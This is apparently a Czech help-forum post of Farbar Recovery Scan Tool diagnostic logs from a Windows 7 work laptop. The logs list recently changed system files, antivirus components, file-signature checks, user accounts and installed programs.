2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:19 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-03-20 08:35 - 2017-02-09 18:19 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-03-20 08:35 - 2017-02-09 18:16 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 18:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-03-20 08:35 - 2017-02-09 18:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-03-20 08:35 - 2017-02-09 18:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-03-20 08:35 - 2017-02-09 18:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-03-20 08:35 - 2017-02-09 18:00 - 03220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-03-20 08:35 - 2017-02-09 17:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-03-20 08:35 - 2017-02-09 17:58 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-03-20 08:35 - 2017-02-09 17:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-03-20 08:35 - 2017-02-09 17:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-03-20 08:35 - 2017-02-09 17:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-03-20 08:35 - 2017-02-09 17:54 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-03-20 08:35 - 2017-02-09 17:54 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-03-20 08:35 - 2017-02-09 17:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-03-20 08:35 - 2017-02-09 17:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-20 08:35 - 2017-02-09 17:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-03-20 08:35 - 2017-02-09 17:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-03-20 08:35 - 2017-02-09 17:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-03-20 08:35 - 2017-02-09 17:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-03-20 08:35 - 2017-02-09 17:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 17:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-03-20 08:35 - 2017-02-09 16:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-20 08:35 - 2017-02-09 16:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-20 08:35 - 2017-02-06 18:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-20 08:35 - 2017-01-24 10:36 - 00002131 _____ C:\Users\Administrator.CEDA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-20 08:35 - 2017-01-13 20:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-20 08:35 - 2017-01-13 20:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-20 08:35 - 2017-01-13 19:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-20 08:35 - 2017-01-13 19:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-20 08:35 - 2017-01-11 20:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-20 08:35 - 2017-01-11 20:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-20 08:35 - 2017-01-11 19:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-20 08:35 - 2017-01-11 19:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-20 08:35 - 2017-01-06 20:00 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-03-20 08:35 - 2017-01-06 19:44 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-20 08:35 - 2016-12-31 17:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-20 08:35 - 2015-06-10 14:10 - 00000000 ____D C:\Users\Administrator.CEDA\AppData\Roaming\Media Center Programs
2017-03-20 08:35 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Administrator.CEDA\Documents\hp.system.package.metadata
2017-03-20 08:35 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Administrator.CEDA\Documents\hp.applications.package.appdata
2017-03-20 08:33 - 2017-03-20 08:33 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Intel Corporation
2017-03-20 08:32 - 2017-04-09 20:51 - 00000000 ____D C:\Users\Tesla\AppData\Local\Google
2017-03-20 08:32 - 2017-04-08 19:01 - 00159392 _____ C:\Users\Tesla\AppData\Local\GDIPFONTCACHEV1.DAT
2017-03-20 08:32 - 2017-03-31 16:02 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Adobe
2017-03-20 08:32 - 2017-03-20 08:32 - 00001400 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-03-20 08:32 - 2017-03-20 08:32 - 00000000 ____D C:\Users\Tesla\Documents\Moje přijaté soubory
2017-03-20 08:32 - 2017-03-20 08:32 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\hpqLog
2017-03-20 08:32 - 2017-03-20 08:32 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Hewlett-Packard
2017-03-20 08:31 - 2017-04-10 08:03 - 00000000 __SHD C:\Users\Tesla\IntelGraphicsProfiles
2017-03-20 08:31 - 2017-04-09 11:37 - 00000000 ____D C:\Users\Tesla\AppData\Local\DigitalPersona
2017-03-20 08:31 - 2017-04-03 13:22 - 00000000 ____D C:\Users\Tesla
2017-03-20 08:31 - 2017-03-20 08:31 - 00000020 ___SH C:\Users\Tesla\ntuser.ini
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Šablony
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Soubory cookie
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Poslední
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Okolní tiskárny
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Okolní síť
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Nabídka Start
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Dokumenty
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Documents\Obrázky
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Documents\Hudba
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Documents\Filmy
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\Data aplikací
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programy
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 _SHDL C:\Users\Tesla\AppData\Local\Data aplikací
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Intel
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\DigitalPersona
2017-03-20 08:31 - 2017-03-20 08:31 - 00000000 ____D C:\Users\Tesla\AppData\Local\VirtualStore
2017-03-20 08:31 - 2017-01-24 10:36 - 00002131 _____ C:\Users\Tesla\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2017-03-20 08:31 - 2015-06-10 14:10 - 00000000 ____D C:\Users\Tesla\AppData\Roaming\Media Center Programs
2017-03-20 08:31 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Tesla\Documents\hp.system.package.metadata
2017-03-20 08:31 - 2015-04-03 11:33 - 00000000 ___HD C:\Users\Tesla\Documents\hp.applications.package.appdata

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-10 19:27 - 2017-01-24 10:57 - 01474832 _____ C:\Windows\system32\Drivers\sfi.dat
2017-04-10 16:05 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-10 16:05 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-10 15:00 - 2017-01-30 18:04 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl
2017-04-10 09:17 - 2015-06-10 13:40 - 00000000 ____D C:\ProgramData\Skype
2017-04-10 08:18 - 2017-01-26 09:43 - 00146942 _____ C:\Windows\system32\Drivers\fvstore.dat
2017-04-10 08:09 - 2015-06-10 14:20 - 00668488 _____ C:\Windows\system32\perfh005.dat
2017-04-10 08:09 - 2015-06-10 14:20 - 00141082 _____ C:\Windows\system32\perfc005.dat
2017-04-10 08:09 - 2009-07-14 07:13 - 01581870 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-10 08:09 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-04-10 08:03 - 2017-01-23 16:44 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-04-10 08:02 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-09 21:01 - 2017-02-13 14:31 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-09 20:53 - 2017-02-02 09:38 - 00000000 ____D C:\Program Files (x86)\Google
2017-04-08 18:56 - 2009-07-14 06:45 - 00566144 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-08 17:42 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2017-04-05 16:37 - 2013-12-03 21:29 - 00000000 ____D C:\Windows\Panther
2017-04-05 08:01 - 2016-12-28 01:20 - 00051808 _____ (COMODO) C:\Windows\system32\cmdcsr.dll
2017-04-05 08:01 - 2016-12-28 01:19 - 00732368 _____ (COMODO) C:\Windows\SysWOW64\guard32.dll
2017-04-05 08:00 - 2016-12-28 01:19 - 00941768 _____ (COMODO) C:\Windows\system32\guard64.dll
2017-04-05 07:58 - 2016-12-28 01:17 - 00457408 _____ (COMODO) C:\Windows\system32\cmdvrt64.dll
2017-04-05 07:58 - 2016-12-28 01:17 - 00230592 _____ (COMODO) C:\Windows\system32\cmdshim64.dll
2017-04-05 07:56 - 2016-12-28 01:15 - 00363200 _____ (COMODO) C:\Windows\SysWOW64\cmdvrt32.dll
2017-04-05 07:56 - 2016-12-28 01:15 - 00194752 _____ (COMODO) C:\Windows\SysWOW64\cmdshim32.dll
2017-04-04 11:43 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\rescache
2017-04-04 08:19 - 2017-01-30 18:05 - 00002958 __RSH C:\ProgramData\ntuser.pol
2017-04-03 16:27 - 2015-06-10 13:35 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-04-03 16:03 - 2013-12-03 21:34 - 00000000 ____D C:\ProgramData\Package Cache
2017-04-03 15:58 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-04-03 09:28 - 2015-06-10 13:35 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-03-28 22:33 - 2016-12-28 01:22 - 00848736 _____ (COMODO) C:\Windows\system32\Drivers\cmdguard.sys
2017-03-28 22:33 - 2016-12-28 01:22 - 00119392 _____ (COMODO) C:\Windows\system32\Drivers\inspect.sys
2017-03-28 22:33 - 2016-12-28 01:22 - 00057504 _____ (COMODO) C:\Windows\system32\Drivers\cmdhlp.sys
2017-03-28 22:33 - 2016-12-28 01:21 - 00031664 _____ (COMODO) C:\Windows\system32\Drivers\cmderd.sys
2017-03-20 12:24 - 2017-01-24 09:49 - 00000000 ____D C:\Program Files (x86)\ArcGIS
2017-03-20 08:48 - 2017-01-24 08:57 - 00000000 ___SD C:\Windows\system32\CompatTel
2017-03-20 08:48 - 2017-01-24 08:57 - 00000000 ____D C:\Windows\system32\appraiser
2017-03-20 08:48 - 2017-01-23 17:30 - 00000000 ____D C:\Windows\system32\MRT
2017-03-20 08:48 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-20 08:46 - 2017-01-23 17:30 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-03-20 08:39 - 2017-01-24 10:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeCommander XE
2017-03-20 08:39 - 2017-01-24 10:54 - 00000000 ____D C:\Program Files (x86)\FreeCommander XE

==================== Files in the root of some directories =======

2015-06-10 13:34 - 2015-06-10 13:35 - 8950670 _____ () C:\ProgramData\hpcsmmsilogs.log
2015-06-10 13:45 - 2015-06-10 13:45 - 1262914 _____ () C:\ProgramData\hpdam_install_log.txt
2015-06-10 13:45 - 2015-06-10 13:45 - 0544572 _____ () C:\ProgramData\HPFileSanitizer_Install_Log.txt

Some files in TEMP:
====================
2017-04-10 09:16 - 2017-04-10 09:16 - 57827288 _____ (Skype Technologies S.A.) C:\Users\Tesla\AppData\Local\Temp\SkypeSetup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-03 10:13

==================== End of FRST.txt ============================
Nahoru
Tesla
Vzorný návštěvník
Vzorný návštěvník
Příspěvky: 94
Registrován: 02 pro 2005 17:10
Bydliště: Praha

Re: Kontrola, pracovní NTB

#7 Příspěvek od Tesla »

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by Tesla (10-04-2017 19:29:15)
Running from C:\Users\Tesla\Desktop
Windows 7 Professional Service Pack 1 (X64) (2017-01-23 14:44:20)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-371995700-114725131-3374930871-500 - Administrator - Disabled)
Guest (S-1-5-21-371995700-114725131-3374930871-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: COMODO Antivirus (Enabled - Up to date) {0C515E80-E355-69BD-3445-A511E5C186FD}
AS: COMODO Advanced Protection (Enabled - Up to date) {B730BF64-C56F-6633-0EF5-9E639E46CC40}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
BitTorrent (HKU\S-1-5-21-3530450637-73980329-3277372514-2116\...\BitTorrent) (Version: 7.10.0.43581 - BitTorrent Inc.)
Blizzard App (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform)
COMODO Internet Security Premium (HKLM\...\COMODO Internet Security) (Version: 10.0.1.6209 - COMODO Security Solutions Inc.)
COMODO Internet Security Premium (Version: 10.0.1.6209 - COMODO Security Solutions Inc.) Hidden
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3920 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 4.2.1.4513 - CyberLink Corp.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.5.1.0230 - Disc Soft Ltd)
Dropbox (HKLM-x32\...\Dropbox) (Version: 23.4.18 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.65.1 - Dropbox, Inc.) Hidden
Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)
Foxit PhantomPDF (HKLM-x32\...\{5F3E0897-97AA-4FC2-A0A9-130A39D0FDFB}) (Version: 6.0.16.324 - Foxit Corporation)
FreeCommander XE (HKLM-x32\...\FreeCommander XE_is1) (Version: - Marek Jasinski)
GIMP 2.8.20 (HKLM\...\GIMP-2_is1) (Version: 2.8.20 - The GIMP Team)
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)
